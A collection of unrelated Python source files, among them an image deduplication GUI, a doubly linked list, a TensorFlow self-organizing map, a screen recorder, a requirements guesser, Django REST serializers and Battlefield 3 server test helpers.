imageA = cv2.imread(str(imageFilesInWorkingFolder[i]))
try:
imageA = cv2.cvtColor(imageA, cv2.COLOR_BGR2GRAY)
except Exception as e:
print("Color to Gray not possible: " + str(imageA) + str(e))
try:
imageA = cv2.resize(imageA, imageSize)
except Exception as e:
print("Resizing not possible: " + str(imageA) + str(e))
for j in range(1 + i, len(imageFilesInWorkingFolder)):
labelStatus.config(text="File: " + str(i + 1) + " of: " + str(len(imageFilesInWorkingFolder))
+ " | Cycle: " + str(j + 1) + " of: " + str(len(imageFilesInWorkingFolder)))
tk_root.update_idletasks() # updates GUI
# print("I-File: " + str(i + 1) + " of: " + str(len(imageFilesInWorkingFolder)))
# print("J-File: " + str(j + 1) + " of: " + str(len(imageFilesInWorkingFolder)))
if not checkDictForExistingValues(imageFilesInWorkingFolder[j], image_score_dict):
imageB = cv2.imread(str(imageFilesInWorkingFolder[j]))
try:
imageB = cv2.cvtColor(imageB, cv2.COLOR_BGR2GRAY)
except Exception as e:
print("Color to Gray not possible: " + str(imageB) + str(e))
try:
imageB = cv2.resize(imageB, imageSize)
except Exception as e:
print("Resizing not possible: " + str(imageB) + str(e))
try:
(score, diff) = structural_similarity(imageA, imageB, multichannel=True, full=True)
except Exception as e:
print("Error checking for similarities" + str(e))
if not checkDictForExistingKeys(imageFilesInWorkingFolder[i]):
createNewKeyInDict(imageFilesInWorkingFolder[i], image_score_dict)
addValueToDictKey(imageFilesInWorkingFolder[i], imageFilesInWorkingFolder[j], score, image_score_dict)
finish = datetime.datetime.now()
labelTimeLeft.config(text="Time spend: " + str(finish - start))
tk_root.update_idletasks() # updates GUI
labelStatus.config(text="Task Done in: " + pathToWorkingFolder)
tk_root.update_idletasks() # updates GUI
dumpToJSON()
finish = datetime.datetime.now()
# print(finish - start)
labelTimeLeft.config(text="Total Time: " + str(finish - start))
tk_root.update_idletasks() # updates GUI
# Quit Program with shortcut
def quitProgram(event):
sys.exit("ShortCut Quit: Event Message: " + str(event))
def choseFolder():
global pathToWorkingFolder
pathToWorkingFolder = fd.askdirectory()
# print(pathToWorkingFolder)
labelStatus.config(text="Folder Selected: " + pathToWorkingFolder)
tk_root.update_idletasks()
def startSearchThreading():
t1 = Thread(target=startSearchForDupes)
t1.start()
# GUI
# tk root
tk_root = Tk()
tk_root.geometry("450x120")
tk_root.bind("<Control-q>", quitProgram) # binding shortcut ctrl+q to function quitProgram()
tk_root.title("DeDup 1.0")
# Gets both half the screen width/height and window width/height
positionRight = int((tk_root.winfo_screenwidth() / 2) - tk_root.winfo_reqwidth())
positionDown = int((tk_root.winfo_screenheight() / 2) - tk_root.winfo_reqheight())
# Positions the window in the center of the page.
tk_root.geometry("+{}+{}".format(positionRight, positionDown))
# Buttons
choseFolder = Button(tk_root, text="Chose Folder", command=choseFolder)
startScan = Button(tk_root, text="Start Scan", command=startSearchThreading)
# Label
labelHeadline = Label(tk_root, text="Image Dedup by Image Content")
labelStatus = Label(tk_root, text="Not in progress")
labelTimeLeft = Label(tk_root, text="Time Spend")
# packing
labelHeadline.pack()
choseFolder.pack()
startScan.pack()
labelStatus.pack()
labelTimeLeft.pack()
# GUI loop
mainloop()
|
class Node:
def __init__(self, data):
self.data = data
self.next = None
self.prev = None
class DoublyLinkedList:
def __init__(self):
self.head = None
def print_list(self):
cur = self.head
while cur and cur.next:
print(cur.data, '-> ', end="")
cur = cur.next
print(cur.data)
def append(self, data) -> None:
"""
Add new node of val data to the end of the list
"""
if self.head is None: # list is empty - make the node head
new_node = Node(data)
self.head = new_node
else: # Add to the end of the list
new_node = Node(data)
# Get the last node first
cur = self.head
while cur.next:
cur = cur.next
cur.next = new_node
new_node.prev = cur
new_node.next = None
def prepend(self, data):
"""
Add new node of val data to the front of the list
"""
if self.head is None:
new_node = Node(data)
self.head = new_node
else:
new_node = Node(data)
# Add the new node to the front of head
self.head.prev = new_node
new_node.next = self.head
# Mark new head node
self.head = new_node
def add_after_node(self, key, data):
"""
Add data after key
"""
cur = self.head
while cur:
# If found the node with value == key
if cur.data == key:
if cur.next is None: # If it is the last node
self.append(data)
return
else:
new_node = Node(data)
nxt = cur.next # Need to store the next node
cur.next = new_node
new_node.next = nxt
nxt.prev = new_node
new_node.prev = cur
# Keep searching for key
cur = cur.next
def add_before_node(self, key, data):
"""
Add data before key
"""
cur = self.head
while cur:
# If found key
if cur.data == key:
if cur.prev is None: # if key is the head node
self.prepend(data) # Simply prepend the data
return
else:
new_node = Node(data)
prev = cur.prev # Need to store the previous node
new_node.next = cur
prev.next = new_node
cur.prev = new_node
new_node.prev = prev
# Keep searching for key
cur = cur.next
def delete(self, key):
cur = self.head
while cur:
# if found the key
if cur.data == key:
# if the node to delete is the head
if cur == self.head:
# Case 1: if the head is the only node
if not cur.next:
self.head = None
# Clear cur node
cur = None
return
# Case 2: if the head has 1 or more nodes behind
else:
nxt = cur.next
self.head = nxt
nxt.prev = None
# Clear cur node and the nodes it was pointing to
cur.next = None
cur = None
return
# If the node to delete is not head node
else:
# Case 3: the node is not the last node, i.e. cur.next is not None
if cur.next:
nxt = cur.next
prev = cur.prev
prev.next = nxt
nxt.prev = prev
# Clear cur node and the nodes it was pointing to
cur.next = None
cur.prev = None
cur = None
return
# Case 4: if the node is the last node, i.e. cur.next is None
else:
prev = cur.prev
prev.next = None
# Clear cur node and the nodes it was pointing to
cur.prev = None
cur = None
return
# Keep searching for the key
cur = cur.next
def delete_node(self, node: Node):
cur = self.head
while cur:
# if found the node
if cur == node:
# if the node to delete is the head
if cur == self.head:
# Case 1: if the head is the only node
if not cur.next:
self.head = None
# Clear cur node
cur = None
return
# Case 2: if the head has 1 or more nodes behind
else:
nxt = cur.next
self.head = nxt
nxt.prev = None
# Clear cur node and the nodes it was pointing to
cur.next = None
cur = None
return
# If the node to delete is not head node
else:
# Case 3: the node is not the last node, i.e. cur.next is not None
if cur.next:
nxt = cur.next
prev = cur.prev
prev.next = nxt
nxt.prev = prev
# Clear cur node and the nodes it was pointing to
cur.next = None
cur.prev = None
cur = None
return
# Case 4: if the node is the last node, i.e. cur.next is None
else:
prev = cur.prev
prev.next = None
# Clear cur node and the nodes it was pointing to
cur.prev = None
cur = None
return
# Keep searching for the key
cur = cur.next
def reverse(self):
tmp = None
cur = self.head
while cur:
tmp = cur.prev
cur.prev = cur.next
cur.next = tmp
# Move to next - note that now the next node is cur.prev not cur.next
cur = cur.prev
if tmp:
# set new head
self.head = tmp.prev
def remove_duplicates(self):
cur = self.head
seen = dict()
while cur:
if cur.data not in seen:
seen[cur.data] = 1
cur = cur.next
else:
nxt = cur.next
self.delete_node(cur)
cur = nxt
def pairs_with_sum(self, sum_val):
pairs = list()
p = self.head
q = None
while p:
q = p.next
while q:
if p.data + q.data == sum_val:
pairs.append((p.data, q.data))
q = q.next
p = p.next
return pairs
dllist = DoublyLinkedList()
dllist.append(1)
dllist.append(2)
dllist.append(3)
dllist.append(4)
dllist.prepend(5)
dllist.print_list() # 5 -> 1 -> 2 -> 3 -> 4
dllist.add_after_node(3, 10)
dllist.print_list() # 5 -> 1 -> 2 -> 3 -> 10 -> 4
dllist.add_after_node(4, 7)
dllist.print_list() # 5 -> 1 -> 2 -> 3 -> 10 -> 4 -> 7
dllist.add_before_node(2, 6)
dllist.print_list() # 5 -> 1 -> 6 -> 2 -> 3 -> 10 -> 4 -> 7
dllist.delete(5)
dllist.print_list() # 1 -> 6 -> 2 -> 3 -> 10 -> 4 -> 7
dllist.delete(6)
dllist.print_list() # 1 -> 2 -> 3 -> 10 -> 4 -> 7
dllist.delete(7)
dllist.print_list() # 1 -> 2 -> 3 -> 10 -> 4
dllist.delete(10)
dllist.print_list() # 1 -> 2 -> 3 -> 4
dllist.reverse()
dllist.print_list() # 4 -> 3 -> 2 -> 1
dllist.append(1)
dllist.append(2)
dllist.append(5)
dllist.append(4)
dllist.print_list() # 4 -> 3 -> 2 -> 1 -> 1 -> 2 -> 5 -> 4
dllist.remove_duplicates()
dllist.print_list() # 4 -> 3 -> 2 -> 1 -> 5
print(dllist.pairs_with_sum(5))
|
import numpy
from tigger.helpers import *
from tigger.core import *
TEMPLATE = template_for(__file__)
def transpose_shape(shape, axes):
return tuple(shape[i] for i in axes)
def transpose(axes, b_start, c_start):
return axes[:b_start] + axes[c_start:] + axes[b_start:c_start]
def possible_transposes(n):
for b in range(n - 1):
for c in range(b + 1, n):
yield b, c
def get_operations(source, target):
visited = set([source])
actions = list(possible_transposes(len(source)))
def traverse(node, breadcrumbs, current_best):
if current_best is not None and len(breadcrumbs) >= len(current_best):
return current_best
for b, c in actions:
result = transpose(node, b, c)
if result in visited and result != target:
continue
visited.add(result)
new_breadcrumbs = breadcrumbs + ((b, c),)
if result == target:
if current_best is None or len(current_best) > len(new_breadcrumbs):
return new_breadcrumbs
current_best = traverse(result, new_breadcrumbs, current_best)
return current_best
return traverse(source, tuple(), None)
def get_transposes(shape, axes=None):
source = tuple(range(len(axes)))
if axes is None:
axes = tuple(reversed(axes))
else:
assert set(source) == set(axes)
for i in range(len(source) - 1, 0, -1):
if source[:i] == axes[:i]:
result = get_operations(source[i:], axes[i:])
prefix = source[:i]
break
else:
result = get_operations(source, axes)
prefix = tuple()
operations = [(b + len(prefix), c + len(prefix)) for b, c in result]
transposes = []
for b, c in operations:
transposes.append((product(shape[:b]), product(shape[b:c]), product(shape[c:])))
shape = transpose(shape, b, c)
return transposes
class Transpose(Computation):
"""
Changes the order of axes in a multidimensional array.
Works analogous to :py:func:`numpy.transpose`.
.. py:method:: prepare_for(output, input, axes=None)
:param output: output array
:param input: input array
:param axes: tuple with the new axes order.
If ``None``, then axes will be reversed.
"""
def _get_argnames(self):
return ('output',), ('input',), tuple()
def _get_basis_for(self, output, input, axes=None, block_width_override=None):
bs = AttrDict(block_width_override=block_width_override)
assert output.dtype is None or output.dtype == input.dtype
bs.dtype = input.dtype
bs.input_shape = input.shape
assert product(output.shape) == product(input.shape)
if axes is None:
axes = tuple(reversed(range(len(input.shape))))
else:
assert set(axes) == set(range(len(input.shape)))
bs.axes = tuple(axes)
return bs
def _get_argvalues(self, basis):
output_shape = transpose_shape(basis.input_shape, basis.axes)
return dict(
output=ArrayValue(output_shape, basis.dtype),
input=ArrayValue(basis.input_shape, basis.dtype))
def _add_transpose(self, operations, basis, device_params,
output_name, input_name, batch, input_height, input_width):
bso = basis.block_width_override
block_width = device_params.local_mem_banks if bso is None else bso
if block_width ** 2 > device_params.max_work_group_size:
# If it is not CPU, current solution may affect performance
block_width = int(numpy.sqrt(device_params.max_work_group_size))
blocks_per_matrix = min_blocks(input_height, block_width)
grid_width = min_blocks(input_width, block_width)
render_kwds = dict(
input_width=input_width, input_height=input_height, batch=batch,
block_width=block_width,
grid_width=grid_width,
blocks_per_matrix=blocks_per_matrix)
operations.add_kernel(
TEMPLATE, 'transpose', [output_name, input_name],
global_size=(grid_width * block_width, blocks_per_matrix * batch * block_width),
local_size=(block_width, block_width),
render_kwds=render_kwds)
def _construct_operations(self, basis, device_params):
operations = self._get_operation_recorder()
transposes = get_transposes(basis.input_shape, basis.axes)
temp_shape = (product(basis.input_shape),)
if len(transposes) == 1:
args = [('output', 'input')]
elif len(transposes) == 2:
tr_temp = operations.add_allocation(temp_shape, basis.dtype)
args = [
(tr_temp, 'input'),
('output', tr_temp)
]
else:
tnames = [
operations.add_allocation(temp_shape, basis.dtype),
operations.add_allocation(temp_shape, basis.dtype)]
iname = 'input'
oname = tnames[0]
args = [(oname, iname)]
other_tname = lambda name: tnames[0] if name == tnames[1] else tnames[1]
for i in range(1, len(transposes)):
iname = oname
oname = 'output' if i == len(transposes) - 1 else other_tname(iname)
args.append((oname, iname))
for tr, arg_pair in zip(transposes, args):
batch, height, width = tr
oname, iname = arg_pair
self._add_transpose(operations, basis, device_params,
oname, iname, batch, height, width)
return operations
|
num=int(input("Enter no. :"))
i=1
def tabel(i, num):
if(i>10):
return 1;
print("{} * {} = {}".format(num, i, num*i))
tabel(i+1, num)
tabel(i, num)
|
import tensorflow as tf
import numpy as np
import pickle
class SOM(object):
#To check if the SOM has been trained
_trained = False
def __init__(self, m, n, dim, n_iterations=100, alpha=None, sigma=None):
self._m = m
self._n = n
if alpha is None:
alpha = 0.3
else:
alpha = float(alpha)
if sigma is None:
sigma = max(m, n) / 2.0
else:
sigma = float(sigma)
self._n_iterations = abs(int(n_iterations))
self._graph = tf.Graph()
with self._graph.as_default():
self._weightage_vects = tf.Variable(tf.random_normal(
[m*n, dim]))
self._location_vects = tf.constant(np.array(
list(self._neuron_locations(m, n))))
self._vect_input = tf.placeholder("float", [dim])
self._iter_input = tf.placeholder("float")
bmu_index = tf.argmin(tf.sqrt(tf.reduce_sum(
tf.pow(tf.subtract(self._weightage_vects, tf.stack(
[self._vect_input for i in range(m*n)])), 2), 1)),
0)
slice_input = tf.pad(tf.reshape(bmu_index, [1]),
np.array([[0, 1]]))
bmu_loc = tf.reshape(tf.slice(self._location_vects, slice_input,
tf.constant(np.array([1, 2]))),
[2])
learning_rate_op = tf.subtract(1.0, tf.div(self._iter_input,
self._n_iterations))
_alpha_op = tf.multiply(alpha, learning_rate_op)
_sigma_op = tf.multiply(sigma, learning_rate_op)
bmu_distance_squares = tf.reduce_sum(tf.pow(tf.subtract(
self._location_vects, tf.stack(
[bmu_loc for i in range(m*n)])), 2), 1)
neighbourhood_func = tf.exp(tf.negative(tf.div(tf.cast(
bmu_distance_squares, "float32"), tf.pow(_sigma_op, 2))))
learning_rate_op = tf.multiply(_alpha_op, neighbourhood_func)
learning_rate_multiplier = tf.stack([tf.tile(tf.slice(
learning_rate_op, np.array([i]), np.array([1])), [dim])
for i in range(m*n)])
weightage_delta = tf.multiply(
learning_rate_multiplier,
tf.subtract(tf.stack([self._vect_input for i in range(m*n)]),
self._weightage_vects))
new_weightages_op = tf.add(self._weightage_vects,
weightage_delta)
self._training_op = tf.assign(self._weightage_vects,
new_weightages_op)
self._sess = tf.Session()
init_op = tf.initialize_all_variables()
self._sess.run(init_op)
def _neuron_locations(self, m, n):
for i in range(m):
for j in range(n):
yield np.array([i, j])
def train(self, input_vects):
for iter_no in range(self._n_iterations):
for input_vect in input_vects:
self._sess.run(self._training_op,
feed_dict={self._vect_input: input_vect,
self._iter_input: iter_no})
print(iter_no/self._n_iterations)
# save the intermediate results
weight = []
loc = []
weight = (list(self._sess.run(self._weightage_vects)))
loc = (list(self._sess.run(self._location_vects)))
if iter_no % 2 == 1:
with open('weights/weight{}.pkl'.format(iter_no),'wb') as output:
pickle.dump(weight,output)
with open('weights/loc{}.pkl'.format(iter_no),'wb') as output1:
pickle.dump(loc,output1)
#Store a centroid grid for easy retrieval later on
centroid_grid = [[] for i in range(self._m)]
self._weightages = list(self._sess.run(self._weightage_vects))
self._locations = list(self._sess.run(self._location_vects))
for i, loc in enumerate(self._locations):
centroid_grid[loc[0]].append(self._weightages[i])
self._centroid_grid = centroid_grid
self._trained = True
def get_centroids(self):
if not self._trained:
raise ValueError("SOM not trained yet")
return self._centroid_grid
def map_vects(self, input_vects):
if not self._trained:
raise ValueError("SOM not trained yet")
to_return = []
for vect in input_vects:
min_index = min([i for i in range(len(self._weightages))],
key=lambda x: np.linalg.norm(vect-
self._weightages[x]))
to_return.append(self._locations[min_index])
return to_return
def map_vects_demo(self,input_vects,weights,loc):
to_return = []
for vect in input_vects:
min_index = min([i for i in range(len(weights))],
key=lambda x: np.linalg.norm(vect-
weights[x]))
to_return.append(loc[min_index])
return to_return
##For plotting the images
#from matplotlib import pyplot as plt
#
##Training inputs for RGBcolors
#colors = np.array(
# [[0., 0., 0.],
# [0., 0., 1.],
# [0., 0., 0.5],
# [0.125, 0.529, 1.0],
# [0.33, 0.4, 0.67],
# [0.6, 0.5, 1.0],
# [0., 1., 0.],
# [1., 0., 0.],
# [0., 1., 1.],
# [1., 0., 1.],
# [1., 1., 0.],
# [1., 1., 1.],
# [.33, .33, .33],
# [.5, .5, .5],
# [.66, .66, .66]])
#color_names = \
# ['black', 'blue', 'darkblue', 'skyblue',
# 'greyblue', 'lilac', 'green', 'red',
# 'cyan', 'violet', 'yellow', 'white',
# 'darkgrey', 'mediumgrey', 'lightgrey']
#
##Train a 20x30 SOM with 400 iterations
#som = SOM(20, 30, 3, 400)
#som.train(colors)
#
##Get output grid
#image_grid = som.get_centroids()
#
##Map colours to their closest neurons
#mapped = som.map_vects(colors)
#
##Plot
#fig = plt.figure('classification')
#plt.imshow(image_grid)
#plt.title('Color SOM')
#for i, m in enumerate(mapped):
# plt.text(m[1], m[0], color_names[i], ha='center', va='center',
# bbox=dict(facecolor='white', alpha=0.5, lw=0))
#plt.show()
#fig.savefig('plt.jpg')
|
import tensorflow as tf
from common.optimizer_template import OptimizerTemplate
class Optimizer(OptimizerTemplate):
def __call__(self,
opt_learning_rate=0.001,
opt_epsilon=1e-8,
**kwargs):
return tf.train.AdamOptimizer(
learning_rate=opt_learning_rate,
epsilon=opt_epsilon) |
#!/usr/bin/env python
#
# -- g@ut.am
import os
import re
import pkgutil
import argparse
def parse_import_string(l, debug=False):
l = l.strip().split('#')[0]
i = re.match('import\s*([a-zA-Z0-9][a-z0-9A-Z.-]+)\s+as\s+.+$', l) or \
re.match('import\s*([a-zA-Z0-9][a-z0-9A-Z. ,-]+)$', l) or \
re.match('from\s+([a-zA-Z0-9][^\s]+)\s+import [a-z0-9A-Z].*', l)
if i:
if debug:
print "\t{}\t => {}".format(l, [_.split('.')[0] for _ in re.split("\s+", i.group(1).strip().replace(",", " "))])
return [_.split('.')[0] for _ in re.split("\s+", i.group(1).strip().replace(",", " "))]
return []
def grep_import_string_from_file(f, debug=False):
lines_with_import = []
with open(f, 'r') as r:
for l in r.read().splitlines():
if "import " in l:
lines_with_import.append(l)
return lines_with_import
def list_imports_from_file(f, existing_modules=[], debug=False):
imports_in_file = []
for import_string in grep_import_string_from_file(f, debug=debug):
imports_in_file += parse_import_string(import_string, debug=debug)
if debug:
print "{} ->\n\t{}\n\t-\n\t{}".format(f, set(imports_in_file), set(existing_modules))
return list(set(imports_in_file) - set(existing_modules))
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description='Guess requirements.txt for your python project by parsing ' +
'"import.." string in python source code. Shows the modules that ' +
'must be installed for your code to run.\n' +
'Note: local module directories inside codebase dir' +
'are not shown. By default modules in sys.path are also not shown.')
parser.add_argument('directory', type=str, nargs="?", default=".",
help='path to directory containing your python project')
parser.add_argument('--all', action="store_true", help="show all modules even ones that are available")
parser.add_argument('--debug', action="store_true", help="debug messages")
args = parser.parse_args()
debug = False
system_module_list = []
local_module_list = []
imported_module_list = []
rootDir = os.path.abspath(args.directory)
if args.debug:
debug = args.debug
if not args.all:
system_module_list = [m[1] for m in pkgutil.iter_modules()]
for dirName, subdirList, fileList in os.walk(rootDir, topdown=True):
# Ignore svn and test dir
subdirList[:] = [d for d in subdirList
if os.path.basename(d)[0] != '.' and
not re.search('(test|\.bak)', os.path.basename(d))]
if os.path.basename(dirName)[0] == '.' or re.search('(test|\.bak)', os.path.basename(dirName)):
continue
# add dir containing __init__.py to ignore
if "__init__.py" in fileList:
local_module_list.append(os.path.basename(dirName))
importable_modules = system_module_list + subdirList +\
[f.replace(".py", "") for f in fileList if re.match('.+\.py', f)]
for fname in fileList:
if not re.match('.*\.py', fname):
continue
imported_module_list += list_imports_from_file(dirName + '/' + fname,
existing_modules=importable_modules,
debug=debug)
imported_modules = set(imported_module_list) - set(local_module_list)
for i in imported_modules:
if system_module_list:
if not pkgutil.get_loader(i):
print(i)
else:
print(i)
#
# end
|
# get the first number
# get the second number
# make an individual function to add, subtract, multiply and divide
# return from each function
# template for add function
def add(num1, num2):
return (num1 + num2)
def sub(num1, num2):
return (num1 - num2)
def multiply(num1, num2):
return (num1 * num2)
def division(num1, num2):
return (num1 / num2)
num1 = int(input("Enter the First Number"))
num2 = int(input("Enter the Second Number"))
print("The sum of number 1 and number 2 is ", (add(num1, num2)))
print(sub(num1, num2))
print(multiply(num1, num2))
print(division(num1, num2)) |
import cv2
import numpy as np
import pyautogui
import datetime
from win32api import GetSystemMetrics
import time
w = GetSystemMetrics(0)
h = GetSystemMetrics(1)
dimension = (w,h)
dateTime = datetime.datetime.now().strftime("%d%m%Y%H%M%S")
# resolution = (1920,1080)
codec = cv2.VideoWriter_fourcc(*"XVID")
filename = dateTime+ ".avi"
fps= 30.0
out = cv2.VideoWriter(filename,codec,fps,dimension)
now = time.time()
# If time specified before
# duration= 10
# duration = int(input("Please tell us in sec: "))
# duration += duration
# end_time= now+duration
cv2.namedWindow("Live", cv2.WINDOW_NORMAL)
cv2.resizeWindow("Live", 480, 270)
while True:
img = pyautogui.screenshot()
frame = np.array(img)
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
out.write(frame)
# If time specified before
# current_time = time.time()
cv2.imshow("Live", frame)
# If time specified before
# if end_time > current_time :
if cv2.waitKey(10) == ord('q'):
break
out.release()
cv2.destroyAllWindows
|
#!/usr/bin/env python
# -*-encoding:UTF-8-*-
from rest_framework import serializers
from options.options import SysOptions
class InvalidLanguage(serializers.ValidationError):
# 无效的语言选择,此类作为报错的基础类,供下面的方法调用
def __init__(self, name):
super().__init__(detail=f"{name} is not a valid language")
class LanguageNameChoiceField(serializers.CharField):
# 提交代码的时候进行的语言选择字段
def to_internal_value(self, data):
data = super().to_internal_value(data)
if data and data not in SysOptions.language_names:
raise InvalidLanguage(data)
return data
class SPJLanguageNameChoiceField(serializers.CharField):
# 特殊评判的语言选择字段
def to_internal_value(self, data):
data = super().to_internal_value(data)
if data and data not in SysOptions.spj_language_names:
raise InvalidLanguage(data)
return data
class LanguageNameMultiChoiceField(serializers.ListField):
# 多重语言选择
def to_internal_value(self, data):
data = super().to_internal_value(data)
for item in data:
if item not in SysOptions.language_names:
raise InvalidLanguage(item)
return data
class SPJLanguageNameMultiChoiceField(serializers.ListField):
# 特殊评判语言的多重选择
def to_internal_value(self, data):
data = super().to_internal_value(data)
for item in data:
if item not in SysOptions.spj_language_names:
raise InvalidLanguage(item)
return data
|
import sys, os
import unittest
import logging
from protocol import FrostbiteServer, CommandFailedError
__all__ = ['Bf3_test_config', 'load_config_file', 'expect_error', 'BF3_connected_TestCase', 'BF3_authenticated_TestCase', 'CommandFailedError']
class Bf3_test_config(object):
host = None
port = None
pw = None
skip_time_consuming_tests = None
ranked = None
def load_config_file():
# load BF3 test server info from config.ini file
config_file = os.path.join(os.path.dirname(os.path.dirname(__file__)), 'config.ini')
def print_help_config_file():
print """ERROR: cannot find config file '%s'
config file content should look like :
[BF3]
host = xx.xx.xx.xx
port = 47000
password = s3cr3t
[TESTS]
skip_time_consuming_tests = true
""" % config_file
if not os.path.isfile(config_file):
print_help_config_file()
sys.exit(1)
import ConfigParser
try:
config = ConfigParser.ConfigParser()
config.read(config_file)
Bf3_test_config.host = config.get('BF3', 'host')
Bf3_test_config.port = config.getint('BF3', 'port')
Bf3_test_config.pw = config.get('BF3', 'password')
Bf3_test_config.ranked = config.getboolean('BF3', 'ranked')
Bf3_test_config.skip_time_consuming_tests = config.getboolean('TESTS', 'skip_time_consuming_tests')
except ConfigParser.NoSectionError, err:
print "ERROR: %r" % err
print_help_config_file()
sys.exit(1)
class expect_error(object):
"""
decorator to expect CommandFailedError while sending a command to the BF3 server.
"""
def __init__(self, error_type=''):
self.error_type = error_type
def __call__(self, func):
def wrapper(*args, **kwargs):
try:
func(*args, **kwargs)
except CommandFailedError, err:
if err.message[0] != self.error_type:
raise AssertionError("expecting %s, got %r instead" % (self.error_type, err))
else:
raise AssertionError("expecting error %s" % self.error_type)
return wrapper
class TestFailuresTypes(tuple):
"""
class that acts a a tuple but when called acts as if AssertionError was called.
Setting a unittest.TestCase failureException attribute to an instance of TestFailuresTypes can make the test runner
interpret additional exception types as failures instead of errors.
"""
def __call__(self, *args, **kwargs):
return AssertionError(*args, **kwargs)
class _BF3_TestCase(object):
protocol_log_level = logging.ERROR
@classmethod
def setUpClassCommon(cls):
if Bf3_test_config.host is None or Bf3_test_config.port is None:
raise AssertionError("BF3 test server host and port not set")
FORMAT = "%(name)-20s [%(thread)-4d] %(threadName)-15s %(levelname)-8s %(message)s"
formatter = logging.Formatter(FORMAT)
handler = logging.StreamHandler()
handler.setFormatter(formatter)
logging.getLogger('FrostbiteServer').addHandler(handler)
logging.getLogger('FrostbiteServer').setLevel(cls.protocol_log_level)
logging.getLogger('FrostbiteDispatcher').addHandler(handler)
logging.getLogger('FrostbiteDispatcher').setLevel(logging.ERROR)
class BF3_connected_TestCase(unittest.TestCase):
failureException = TestFailuresTypes((AssertionError, CommandFailedError))
t_conn = None
@classmethod
def setUpClass(cls):
"""
Setup loggers, connect to the test BF3 server.
Run once for the whole class.
"""
super(BF3_connected_TestCase, cls).setUpClassCommon()
try:
cls.t_conn = FrostbiteServer(Bf3_test_config.host, Bf3_test_config.port)
except:
if hasattr(cls, 't_conn') and cls.t_conn:
cls.t_conn.stop()
raise
@classmethod
def tearDownClass(cls):
"""
run once after all tests are done.
"""
cls.t_conn.stop()
def cmd(self, *args):
"""
convenient shortcut to send a command from our test methods.
"""
return self.__class__.t_conn.command(*args)
BF3_connected_TestCase.__bases__ += (_BF3_TestCase, )
class BF3_authenticated_TestCase(unittest.TestCase):
failureException = TestFailuresTypes((AssertionError, CommandFailedError))
t_conn = None
@classmethod
def setUpClass(cls):
"""
Setup loggers, connect and auth to the test BF3 server.
Run once for the whole class.
"""
super(BF3_authenticated_TestCase, cls).setUpClassCommon()
try:
cls.t_conn = FrostbiteServer(Bf3_test_config.host, Bf3_test_config.port, Bf3_test_config.pw)
cls.t_conn.auth()
except:
if hasattr(cls, 't_conn') and cls.t_conn:
cls.t_conn.stop()
raise
@classmethod
def tearDownClass(cls):
"""
run once after all tests are done.
"""
cls.t_conn.stop()
def cmd(self, *args):
"""
convenient shortcut to send a command from our test methods.
"""
return self.__class__.t_conn.command(*args)
BF3_authenticated_TestCase.__bases__ += (_BF3_TestCase, )
|
from time import sleep
from game import constants
from game.score import Score
from game import buffer
class Director:
"""A code template for a person who directs the game. The responsibility of
this class of objects is to control the sequence of play.
Stereotype:
Controller
Attributes:
input_service (InputService): The input mechanism.
keep_playing (boolean): Whether or not the game can continue.
output_service (OutputService): The output mechanism.
score (Score): The current score.
"""
def __init__(self, input_service, output_service):
"""The class constructor.
Args:
self (Director): an instance of Director.
"""
self._input_service = input_service
self._keep_playing = True
self._output_service = output_service
self._score = Score()
self._buffer = buffer()
self._word = word()
def start_game(self):
"""Starts the game loop to control the sequence of play.
Args:
self (Director): an instance of Director.
"""
while self._keep_playing:
self._get_inputs()
self._do_updates()
self._do_outputs()
sleep(constants.FRAME_LENGTH)
def _get_inputs(self):
"""Gets the inputs at the beginning of each round of play. In this case,
that means getting the desired direction and moving the snake.
Args:
self (Director): An instance of Director.
"""
#Declare "direction" as the variable that holds the Director's directions, such as entering a word.
direction = self._input_service.get_key()
# ASCII value of 10 means the enter key.
if direction == 10:
for word in words:
if word.text == self._buffer.get_content():
self._score.add_points(points)
word.reset()
def _do_updates(self):
"""Updates the important game information for each round of play. In
snake's case, it meant checking for a collision and updating the score.
Args:
self (Director): An instance of Director.
"""
pass
def _do_outputs(self):
"""Outputs the important game information for each round of play. In
this case, that means checking if there are stones left and declaring
the winner.
Args:
self (Director): An instance of Director.
"""
self._output_service.clear_screen()
#Not sure what the difference is between draw_actors and draw_actor, I think this depends on how the words are stored/displayed self._output_service.draw_actors(self._words)
self._output_service.draw_actor(self._score)
self._output_service.flush_buffer() |
from app.infrastructure.humouword import HumouWordDataSource
from lib.domain.model.humouword import HumouWord
from lib.domain.model.humouword import WordId
from lib.domain.model.humou import Humou
from lib.domain.model.humou_factory import HumouFactory
class HumouWordRegisterService:
def __init__(self, humou_word_datasource: HumouWordDataSource) -> None:
self.humou_word_datasource = humou_word_datasource
def register(self, humou_word: HumouWord) -> bool:
self.humou_word_datasource.register(humou_word)
return True
class HumouWordGetService:
def __init__(self, humou_word_datasource: HumouWordDataSource) -> None:
self.humou_word_datasource = humou_word_datasource
def find_all(self) -> list:
humou_word_list = self.humou_word_datasource.find_all()
return humou_word_list
def find_by_id(self, word_id: WordId) -> HumouWord:
humou_word = self.humou_word_datasource.find_by_id(word_id)
return humou_word
class HumouWordDeleteService:
def __init__(self, humou_word_datasource: HumouWordDataSource) -> None:
self.humou_word_datasource = humou_word_datasource
def delete(self, humou_word: HumouWord) -> bool:
self.humou_word_datasource.delete(humou_word)
return True
def delete_multi(self, humou_word_list: list) -> bool:
for humou_word in humou_word_list:
self.humou_word_datasource.delete(humou_word)
return True
class GetHumouService:
def __init__(self, humou_word_datasource: HumouWordDataSource) -> None:
self.humou_word_datasource = humou_word_datasource
def get(self) -> dict:
top_word = self.humou_word_datasource.get_top_word_random()
bottom_word = self.humou_word_datasource.get_bottom_word_random()
humou = HumouFactory.create(top_word=top_word,
bottom_word=bottom_word)
return humou.to_dict()
|
from .models import Editor, Category, Author, Book
from .constants import SERVICE_CHOICES
from rest_framework import serializers
class EditorSerializer(serializers.ModelSerializer):
class Meta:
model = Editor
fields = '__all__'
class CategorySerializer(serializers.ModelSerializer):
class Meta:
model = Category
fields = '__all__'
class AuthorSerializer(serializers.ModelSerializer):
class Meta:
model = Author
fields = '__all__'
class BookSerializer(serializers.ModelSerializer):
class Meta:
model = Book
fields = '__all__'
class SearchSerializer(serializers.Serializer):
search_term = serializers.CharField(max_length=200)
alternative_service = serializers.ChoiceField(choices=SERVICE_CHOICES)
class DeleteSerializer(serializers.Serializer):
id = serializers.IntegerField()
|
# coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
